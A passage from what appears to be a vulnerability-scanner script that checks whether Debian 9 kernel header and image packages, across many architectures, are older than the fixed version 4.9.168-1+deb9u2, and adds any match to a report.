= isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-8-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-9-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n 